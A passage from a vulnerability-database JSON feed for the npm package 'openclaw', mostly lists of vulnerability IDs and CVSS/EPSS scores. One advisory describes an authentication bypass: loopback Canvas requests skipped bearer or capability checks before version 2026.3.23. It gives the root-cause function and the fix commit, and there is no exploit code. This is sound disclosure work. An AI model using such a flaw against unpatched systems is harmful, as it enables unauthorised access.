                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.23"
                }
            ],
            "aliases": [
                "CVE-2026-35618",
                "GHSA-cg6c-q2hx-69h7"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v1bp-hw9a-yffz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91274?format=api",
            "vulnerability_id": "VCID-v91b-1nmx-ckcx",
            "summary": "OpenClaw: Gateway Canvas local-direct requests bypass Canvas HTTP and WebSocket authentication\n## Summary\nBefore `v2026.3.23`, Canvas and A2UI loopback requests could bypass Canvas bearer-or-capability authentication because `authorizeCanvasRequest(...)` treated `isLocalDirectRequest(...)` as an unconditional allow path.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: `< 2026.3.23`\n- Fixed: `>= 2026.3.23`\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Root Cause\nThe vulnerable logic lived in `src/gateway/server/http-auth.ts`. `authorizeCanvasRequest(...)` returned `{ ok: true }` for local-direct requests before checking bearer authentication or an active node canvas capability, which meant unauthenticated loopback Canvas HTTP and WebSocket requests could succeed.\n\n## Fix Commit(s)\n- `d5dc6b6573ae489bc7e5651090f4767b93537c9e` — `fix(gateway): require auth for canvas routes`\n\n## Release Status\nThe fix commit is contained in released tags `v2026.3.23` and `v2026.3.23-2`. The latest shipped tag and npm release both include the fix.\n\n## Code-Level Confirmation\n- `src/gateway/server/http-auth.ts` no longer contains the local-direct early return in `authorizeCanvasRequest(...)`.\n- `src/gateway/server.canvas-auth.test.ts` adds the regression test `denies canvas HTTP/WS on loopback without bearer or capability by default`.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35634",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10198",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10235",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10214",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35634"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d5dc6b6573ae489bc7e5651090f4767b93537c9e"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6mqc-jqh6-x8fc"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35634",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35634"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T12:30:11Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-local-direct-requests-in-canvas-gateway"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6mqc-jqh6-x8fc",
                    "reference_id": "GHSA-6mqc-jqh6-x8fc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-6mqc-jqh6-x8fc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110761?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.23",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
